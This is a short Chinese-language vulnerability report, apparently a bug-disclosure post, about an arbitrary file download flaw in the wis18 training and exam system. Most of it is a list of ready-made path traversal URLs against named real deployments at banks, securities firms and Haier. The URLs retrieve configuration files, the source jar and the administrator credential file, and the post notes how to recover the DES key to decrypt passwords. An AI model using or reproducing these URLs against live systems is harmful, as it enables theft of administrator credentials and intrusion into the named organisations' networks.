服务厂商为:http://www.newvane.com.cn/ 但按照域名找到北京的http://www.wis18.com/ 两家公司是一个公司吧。
客户列表在:http://www.newvane.com.cn/index.php?ac=article&at=read&did=351
漏洞为任意文件下载漏洞,可导致各种信息泄露。很多在内网
以民生银行内部员工考试系统为例:
http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/web.xml
http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/lib/wis18.jar 源码包
/system/config/ds.xml 数据配置文件
system/config/manauser.xml 管理员账号密码
因为密码都是des加密的 所以编译后找到deskey
其他客户:
上海银行:http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/manauser.xml
海尔:http://haierhr.ct-edu.com.cn/wis18/file.showimage.flow?filename=../system/config/manauser.xml
http://www.sdchuxin.com/wis18/file.showimage.flow?filename=../system/config/manauser.xml
广发证券:http://121.8.153.10/wis18/file.showimage.flow?filename=../system/config/manauser.xml
工商银行http://80.34.174.3/wis18/ 貌似不能外网访问。